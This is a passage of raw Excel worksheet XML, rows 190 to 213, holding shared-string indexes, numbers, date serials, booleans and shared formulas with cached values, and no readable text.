      </c>
      <c r="I190" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J190" s="1" t="s">
        <v>1018</v>
      </c>
      <c r="K190" s="2" t="s">
        <v>1019</v>
      </c>
      <c r="L190" s="1">
        <v>2.0</v>
      </c>
      <c r="M190" s="1">
        <v>4.0</v>
      </c>
      <c r="N190" s="1" t="s">
        <v>601</v>
      </c>
      <c r="O190" s="1" t="s">
        <v>1020</v>
      </c>
      <c r="P190" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q190" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R190" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S190" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="1">
        <v>2573.0</v>
      </c>
      <c r="B191" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="C191" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D191" s="2" t="s">
        <v>1024</v>
      </c>
      <c r="E191" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F191" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G191" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H191" s="4">
        <v>44293.94027777778</v>
      </c>
      <c r="I191" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J191" s="1" t="s">
        <v>1018</v>
      </c>
      <c r="K191" s="2" t="s">
        <v>1019</v>
      </c>
      <c r="L191" s="1">
        <v>2.0</v>
      </c>
      <c r="M191" s="1">
        <v>4.0</v>
      </c>
      <c r="N191" s="1" t="s">
        <v>875</v>
      </c>
      <c r="O191" s="1" t="s">
        <v>1020</v>
      </c>
      <c r="P191" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q191" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R191" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S191" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="1">
        <v>2580.0</v>
      </c>
      <c r="B192" s="2" t="s">
        <v>1025</v>
      </c>
      <c r="C192" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D192" s="2" t="s">
        <v>1026</v>
      </c>
      <c r="E192" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F192" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="G192" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H192" s="4">
        <v>44293.138194444444</v>
      </c>
      <c r="I192" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J192" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="K192" s="2" t="s">
        <v>1029</v>
      </c>
      <c r="L192" s="1">
        <v>4.0</v>
      </c>
      <c r="M192" s="1">
        <v>7.0</v>
      </c>
      <c r="N192" s="1" t="s">
        <v>1030</v>
      </c>
      <c r="O192" s="1" t="s">
        <v>1031</v>
      </c>
      <c r="P192" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q192" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R192" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S192" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="1">
        <v>2582.0</v>
      </c>
      <c r="B193" s="2" t="s">
        <v>1032</v>
      </c>
      <c r="C193" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D193" s="6" t="s">
        <v>1022</v>
      </c>
      <c r="E193" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F193" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G193" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H193" s="4">
        <v>44293.64166666667</v>
      </c>
      <c r="I193" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J193" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="K193" s="2" t="s">
        <v>1029</v>
      </c>
      <c r="L193" s="1">
        <v>4.0</v>
      </c>
      <c r="M193" s="1">
        <v>7.0</v>
      </c>
      <c r="N193" s="1" t="s">
        <v>1033</v>
      </c>
      <c r="O193" s="1" t="s">
        <v>1031</v>
      </c>
      <c r="P193" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q193" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R193" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S193" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="1">
        <v>2583.0</v>
      </c>
      <c r="B194" s="2" t="s">
        <v>1034</v>
      </c>
      <c r="C194" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D194" s="6" t="s">
        <v>1022</v>
      </c>
      <c r="E194" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F194" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G194" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="4">
        <v>44293.645833333336</v>
      </c>
      <c r="I194" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J194" s="1" t="s">
        <v>1035</v>
      </c>
      <c r="K194" s="2" t="s">
        <v>1029</v>
      </c>
      <c r="L194" s="1">
        <v>3.0</v>
      </c>
      <c r="M194" s="1">
        <v>4.0</v>
      </c>
      <c r="N194" s="1" t="s">
        <v>1036</v>
      </c>
      <c r="O194" s="1" t="s">
        <v>1037</v>
      </c>
      <c r="P194" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q194" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R194" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S194" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="1">
        <v>2584.0</v>
      </c>
      <c r="B195" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="C195" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D195" s="6" t="s">
        <v>1024</v>
      </c>
      <c r="E195" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F195" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G195" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H195" s="4">
        <v>44293.936111111114</v>
      </c>
      <c r="I195" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J195" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="K195" s="2" t="s">
        <v>1029</v>
      </c>
      <c r="L195" s="1">
        <v>4.0</v>
      </c>
      <c r="M195" s="1">
        <v>7.0</v>
      </c>
      <c r="N195" s="1" t="s">
        <v>1038</v>
      </c>
      <c r="O195" s="1" t="s">
        <v>1031</v>
      </c>
      <c r="P195" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q195" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R195" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S195" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="1">
        <v>2587.0</v>
      </c>
      <c r="B196" s="2" t="s">
        <v>1039</v>
      </c>
      <c r="C196" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D196" s="2" t="s">
        <v>1000</v>
      </c>
      <c r="E196" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F196" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G196" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H196" s="4">
        <v>44294.59444444445</v>
      </c>
      <c r="I196" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J196" s="1" t="s">
        <v>1040</v>
      </c>
      <c r="K196" s="2" t="s">
        <v>1041</v>
      </c>
      <c r="L196" s="1">
        <v>2.0</v>
      </c>
      <c r="M196" s="1">
        <v>3.0</v>
      </c>
      <c r="N196" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O196" s="1" t="s">
        <v>1042</v>
      </c>
      <c r="P196" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q196" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R196" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S196" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="1">
        <v>2588.0</v>
      </c>
      <c r="B197" s="2" t="s">
        <v>1043</v>
      </c>
      <c r="C197" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D197" s="2" t="s">
        <v>1024</v>
      </c>
      <c r="E197" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F197" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G197" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="4">
        <v>44294.59722222222</v>
      </c>
      <c r="I197" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J197" s="1" t="s">
        <v>1040</v>
      </c>
      <c r="K197" s="2" t="s">
        <v>1041</v>
      </c>
      <c r="L197" s="1">
        <v>2.0</v>
      </c>
      <c r="M197" s="1">
        <v>3.0</v>
      </c>
      <c r="N197" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O197" s="1" t="s">
        <v>1042</v>
      </c>
      <c r="P197" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q197" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R197" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S197" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="1">
        <v>2590.0</v>
      </c>
      <c r="B198" s="2" t="s">
        <v>1044</v>
      </c>
      <c r="C198" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D198" s="2" t="s">
        <v>1024</v>
      </c>
      <c r="E198" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F198" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G198" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H198" s="4">
        <v>44564.58541666667</v>
      </c>
      <c r="I198" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J198" s="1" t="s">
        <v>1045</v>
      </c>
      <c r="K198" s="2" t="s">
        <v>1046</v>
      </c>
      <c r="L198" s="1">
        <v>3.0</v>
      </c>
      <c r="M198" s="1">
        <v>4.0</v>
      </c>
      <c r="N198" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O198" s="1" t="s">
        <v>1047</v>
      </c>
      <c r="P198" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q198" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R198" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S198" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="1">
        <v>2601.0</v>
      </c>
      <c r="B199" s="2" t="s">
        <v>1048</v>
      </c>
      <c r="C199" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D199" s="2" t="s">
        <v>705</v>
      </c>
      <c r="E199" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F199" s="1" t="s">
        <v>1049</v>
      </c>
      <c r="G199" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H199" s="1" t="s">
        <v>1050</v>
      </c>
      <c r="I199" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J199" s="1" t="s">
        <v>1051</v>
      </c>
      <c r="K199" s="2" t="s">
        <v>1052</v>
      </c>
      <c r="L199" s="1">
        <v>1.0</v>
      </c>
      <c r="M199" s="1">
        <v>1.0</v>
      </c>
      <c r="N199" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O199" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P199" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q199" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R199" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S199" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="1">
        <v>2602.0</v>
      </c>
      <c r="B200" s="2" t="s">
        <v>1053</v>
      </c>
      <c r="C200" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D200" s="2" t="s">
        <v>1054</v>
      </c>
      <c r="E200" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F200" s="1" t="s">
        <v>1055</v>
      </c>
      <c r="G200" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H200" s="1" t="s">
        <v>1056</v>
      </c>
      <c r="I200" s="1" t="s">
        <v>623</v>
      </c>
      <c r="J200" s="1" t="s">
        <v>1057</v>
      </c>
      <c r="K200" s="2" t="s">
        <v>1058</v>
      </c>
      <c r="L200" s="1">
        <v>1.0</v>
      </c>
      <c r="M200" s="1">
        <v>1.0</v>
      </c>
      <c r="N200" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O200" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P200" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q200" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R200" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S200" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="1">
        <v>2603.0</v>
      </c>
      <c r="B201" s="2" t="s">
        <v>1059</v>
      </c>
      <c r="C201" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D201" s="2" t="s">
        <v>1060</v>
      </c>
      <c r="E201" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F201" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G201" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H201" s="4">
        <v>44409.92916666667</v>
      </c>
      <c r="I201" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J201" s="1" t="s">
        <v>1061</v>
      </c>
      <c r="K201" s="2" t="s">
        <v>1062</v>
      </c>
      <c r="L201" s="1">
        <v>1.0</v>
      </c>
      <c r="M201" s="1">
        <v>1.0</v>
      </c>
      <c r="N201" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O201" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P201" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q201" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R201" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S201" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="1">
        <v>2636.0</v>
      </c>
      <c r="B202" s="2" t="s">
        <v>1064</v>
      </c>
      <c r="C202" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D202" s="2" t="s">
        <v>1065</v>
      </c>
      <c r="E202" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F202" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G202" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H202" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="I202" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J202" s="1" t="s">
        <v>1067</v>
      </c>
      <c r="K202" s="2" t="s">
        <v>1068</v>
      </c>
      <c r="L202" s="1">
        <v>2.0</v>
      </c>
      <c r="M202" s="1">
        <v>2.0</v>
      </c>
      <c r="N202" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O202" s="1" t="s">
        <v>514</v>
      </c>
      <c r="P202" s="1" t="s">
        <v>1069</v>
      </c>
      <c r="Q202" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R202" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S202" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="1">
        <v>2637.0</v>
      </c>
      <c r="B203" s="2" t="s">
        <v>1070</v>
      </c>
      <c r="C203" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D203" s="2" t="s">
        <v>1071</v>
      </c>
      <c r="E203" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F203" s="1" t="s">
        <v>1072</v>
      </c>
      <c r="G203" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H203" s="1" t="s">
        <v>1073</v>
      </c>
      <c r="I203" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J203" s="1" t="s">
        <v>1067</v>
      </c>
      <c r="K203" s="2" t="s">
        <v>1068</v>
      </c>
      <c r="L203" s="1">
        <v>2.0</v>
      </c>
      <c r="M203" s="1">
        <v>2.0</v>
      </c>
      <c r="N203" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O203" s="1" t="s">
        <v>514</v>
      </c>
      <c r="P203" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q203" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R203" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S203" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="1">
        <v>2638.0</v>
      </c>
      <c r="B204" s="2" t="s">
        <v>1074</v>
      </c>
      <c r="C204" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D204" s="2" t="s">
        <v>1075</v>
      </c>
      <c r="E204" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F204" s="1" t="s">
        <v>1076</v>
      </c>
      <c r="G204" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H204" s="1" t="s">
        <v>1077</v>
      </c>
      <c r="I204" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="J204" s="1" t="s">
        <v>1079</v>
      </c>
      <c r="K204" s="2" t="s">
        <v>1080</v>
      </c>
      <c r="L204" s="1">
        <v>1.0</v>
      </c>
      <c r="M204" s="1">
        <v>1.0</v>
      </c>
      <c r="N204" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O204" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P204" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q204" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R204" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S204" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="1">
        <v>2746.0</v>
      </c>
      <c r="B205" s="2" t="s">
        <v>1081</v>
      </c>
      <c r="C205" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D205" s="2" t="s">
        <v>1082</v>
      </c>
      <c r="E205" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F205" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G205" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H205" s="4">
        <v>44475.061111111114</v>
      </c>
      <c r="I205" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J205" s="1" t="s">
        <v>1083</v>
      </c>
      <c r="K205" s="2" t="s">
        <v>1084</v>
      </c>
      <c r="L205" s="1">
        <v>1.0</v>
      </c>
      <c r="M205" s="1">
        <v>1.0</v>
      </c>
      <c r="N205" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O205" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P205" s="1" t="s">
        <v>1085</v>
      </c>
      <c r="Q205" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R205" s="2">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="S205" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="1">
        <v>2747.0</v>
      </c>
      <c r="B206" s="2" t="s">
        <v>1086</v>
      </c>
      <c r="C206" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D206" s="2" t="s">
        <v>1087</v>
      </c>
      <c r="E206" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F206" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G206" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H206" s="4">
        <v>44054.736805555556</v>
      </c>
      <c r="I206" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J206" s="1" t="s">
        <v>1088</v>
      </c>
      <c r="K206" s="2" t="s">
        <v>1089</v>
      </c>
      <c r="L206" s="1">
        <v>1.0</v>
      </c>
      <c r="M206" s="1">
        <v>1.0</v>
      </c>
      <c r="N206" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O206" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P206" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q206" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R206" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S206" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="1">
        <v>2748.0</v>
      </c>
      <c r="B207" s="2" t="s">
        <v>1090</v>
      </c>
      <c r="C207" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D207" s="2" t="s">
        <v>1091</v>
      </c>
      <c r="E207" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F207" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G207" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H207" s="1" t="s">
        <v>1092</v>
      </c>
      <c r="I207" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J207" s="1" t="s">
        <v>1093</v>
      </c>
      <c r="K207" s="2" t="s">
        <v>1094</v>
      </c>
      <c r="L207" s="1">
        <v>1.0</v>
      </c>
      <c r="M207" s="1">
        <v>1.0</v>
      </c>
      <c r="N207" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O207" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P207" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q207" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R207" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S207" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="1">
        <v>2749.0</v>
      </c>
      <c r="B208" s="2" t="s">
        <v>1095</v>
      </c>
      <c r="C208" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D208" s="2" t="s">
        <v>1096</v>
      </c>
      <c r="E208" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F208" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G208" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H208" s="4">
        <v>44564.225694444445</v>
      </c>
      <c r="I208" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J208" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="K208" s="2" t="s">
        <v>1099</v>
      </c>
      <c r="L208" s="1">
        <v>3.0</v>
      </c>
      <c r="M208" s="1">
        <v>5.0</v>
      </c>
      <c r="N208" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O208" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="P208" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q208" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R208" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S208" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="1">
        <v>2750.0</v>
      </c>
      <c r="B209" s="2" t="s">
        <v>1101</v>
      </c>
      <c r="C209" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D209" s="2" t="s">
        <v>1102</v>
      </c>
      <c r="E209" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F209" s="1" t="s">
        <v>1103</v>
      </c>
      <c r="G209" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H209" s="4">
        <v>44564.64791666667</v>
      </c>
      <c r="I209" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J209" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="K209" s="2" t="s">
        <v>1099</v>
      </c>
      <c r="L209" s="1">
        <v>3.0</v>
      </c>
      <c r="M209" s="1">
        <v>5.0</v>
      </c>
      <c r="N209" s="1" t="s">
        <v>1104</v>
      </c>
      <c r="O209" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="P209" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q209" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R209" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S209" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="1">
        <v>2751.0</v>
      </c>
      <c r="B210" s="2" t="s">
        <v>1105</v>
      </c>
      <c r="C210" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D210" s="2" t="s">
        <v>1102</v>
      </c>
      <c r="E210" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F210" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G210" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="4">
        <v>44564.941666666666</v>
      </c>
      <c r="I210" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J210" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="K210" s="2" t="s">
        <v>1099</v>
      </c>
      <c r="L210" s="1">
        <v>3.0</v>
      </c>
      <c r="M210" s="1">
        <v>5.0</v>
      </c>
      <c r="N210" s="1" t="s">
        <v>1106</v>
      </c>
      <c r="O210" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="P210" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q210" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R210" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S210" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="1">
        <v>2752.0</v>
      </c>
      <c r="B211" s="2" t="s">
        <v>1107</v>
      </c>
      <c r="C211" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D211" s="2" t="s">
        <v>1102</v>
      </c>
      <c r="E211" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F211" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G211" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H211" s="4">
        <v>44595.02847222222</v>
      </c>
      <c r="I211" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J211" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="K211" s="2" t="s">
        <v>1099</v>
      </c>
      <c r="L211" s="1">
        <v>3.0</v>
      </c>
      <c r="M211" s="1">
        <v>5.0</v>
      </c>
      <c r="N211" s="1" t="s">
        <v>1108</v>
      </c>
      <c r="O211" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="P211" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q211" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R211" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S211" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="1">
        <v>2753.0</v>
      </c>
      <c r="B212" s="2" t="s">
        <v>1109</v>
      </c>
      <c r="C212" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D212" s="2" t="s">
        <v>1102</v>
      </c>
      <c r="E212" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F212" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G212" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="4">
        <v>44595.029861111114</v>
      </c>
      <c r="I212" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J212" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="K212" s="2" t="s">
        <v>1099</v>
      </c>
      <c r="L212" s="1">
        <v>3.0</v>
      </c>
      <c r="M212" s="1">
        <v>5.0</v>
      </c>
      <c r="N212" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O212" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="P212" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q212" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R212" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S212" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="1">
        <v>2754.0</v>
      </c>
      <c r="B213" s="2" t="s">
        <v>1110</v>
      </c>
      <c r="C213" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D213" s="2" t="s">
        <v>1111</v>
      </c>
      <c r="E213" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F213" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G213" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H213" s="4">
        <v>44564.91805555556</v>
      </c>
      <c r="I213" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J213" s="1" t="s">
        <v>1112</v>
      </c>
      <c r="K213" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="L213" s="1">
        <v>5.0</v>
      </c>
      <c r="M213" s="1">
        <v>8.0</v>
      </c>
      <c r="N213" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O213" s="1" t="s">
        <v>1114</v>
      </c>
      <c r="P213" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q213" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R213" s="2">
